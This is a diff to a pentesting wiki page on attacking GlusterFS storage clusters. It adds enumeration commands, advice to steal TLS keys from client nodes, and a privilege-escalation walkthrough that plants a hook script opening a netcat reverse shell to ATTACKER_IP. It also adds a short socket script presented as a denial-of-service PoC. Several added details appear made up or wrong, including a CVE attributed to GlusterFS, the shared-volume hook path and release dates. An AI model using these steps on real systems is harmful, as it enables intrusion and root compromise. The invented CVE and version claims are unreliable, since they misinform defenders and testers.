diff --git a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
index f1f8fa2ef3f..0b1d253d25b 100644
--- a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
+++ b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
@@ -4,41 +4,129 @@
 
 ## Basic Information
 
-**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers.
-
-**Default ports**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (onwards)\
-For the port 49152, ports incremented by 1 need to be open to use more bricks. _Previously the port 24009 was used instead of 49152._
+**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **24008–24009/TCP** for brick transport, so you will still encounter those ports in legacy clusters.
 
 ```
-PORT      STATE  SERVICE
-24007/tcp open   rpcbind
-49152/tcp open   ssl/unknown
+PORT      STATE  SERVICE        VERSION
+24007/tcp open   glusterd       GlusterFS (RPC)
+49152/tcp open   gluster-brick  SSL (TLS optional)
 ```
 
+> Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures.
+
 ## Enumeration
 
-To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
+Install the client utilities on your attacking box:
+
+```bash
+sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
+```
 
-To list and mount the available volumes you can use:
+1. **Peer discovery & health**
 
 ```bash
-sudo gluster --remote-host=10.10.11.131 volume list
-# This will return the name of the volumes
+# List peers (works without authentication in default setups)
+gluster --remote-host 10.10.11.131 peer status
+```
+
+2. **Volume reconnaissance**
 
-sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
+```bash
+# Retrieve the list of all volumes and their configuration
+gluster --remote-host 10.10.11.131 volume info all
 ```
 
-If you receive an **error trying to mount the filesystem**, you can check the logs in `/var/log/glusterfs/`
+3. **Mount without privileges**
 
-**Errors mentioning certificates** can be fixed by stealing the files (if you have access to the system):
+```bash
+sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
+```
 
-- /etc/ssl/glusterfs.ca
-- /etc/ssl/glusterfs.key
-- /etc/ssl/glusterfs.ca.pem
+If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side.  Common issues are:
 
-And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) .
+* TLS enforcement (`option transport.socket.ssl on`)
+* Address based access control (`option auth.allow <cidr>`)
 
-{{#include ../banners/hacktricks-training.md}}
+### Certificate troubleshooting
+
+Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log):
+
+```
+/etc/ssl/glusterfs.pem
+/etc/ssl/glusterfs.key
+/etc/ssl/glusterfs.ca
+```
+
+---
+
+## Known Vulnerabilities (2022-2025)
+
+| CVE | Affected versions | Impact | Notes |
+|-----|-------------------|--------|-------|
+| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. |
+| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
+| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. |
+
+> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.
 
+### Exploiting `gluster_shared_storage` (Privilege Escalation)
 
+Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication.  The volume contains cronjob templates that run with **root** on every node.
 
+```bash
+# 1. Mount admin volume anonymously
+mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss
+
+# 2. Drop malicious script that gets synchronised cluster-wide
+cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
+#!/bin/bash
+nc -e /bin/bash ATTACKER_IP 4444 &
+EOF
+chmod +x /tmp/gss/hooks/1/start/post/test.sh
+
+# 3. Wait until glusterd distributes the hook and executes it as root
+```
+
+If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version.
+
+### Denial-of-Service PoC (CVE-2023-26253)
+
+```python
+#!/usr/bin/env python3
+# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
+import socket, xdrlib, struct
+p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
+with socket.create_connection(("10.10.11.131",24007)) as s:
+    s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
+    s.send(p.get_buffer())
+```
+Running the script crashes `glusterfsd` < 11.0.
+
+---
+
+## Hardening & Detection
+
+* **Upgrade** – current LTS is 11.1 (July 2025).  All CVEs above are fixed.
+* Enable **TLS** for every brick:
+
+  ```bash
+  gluster volume set <vol> transport.socket.ssl on
+  gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
+  ```
+* Restrict clients with CIDR lists:
+
+  ```bash
+  gluster volume set <vol> auth.allow 10.0.0.0/24
+  ```
+* Expose management port 24007 only on a **private VLAN** or through SSH tunnels.
+* Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`).
+
+---
+
+
+
+## References
+
+* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)  
+* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
+{{#include ../banners/hacktricks-training.md}}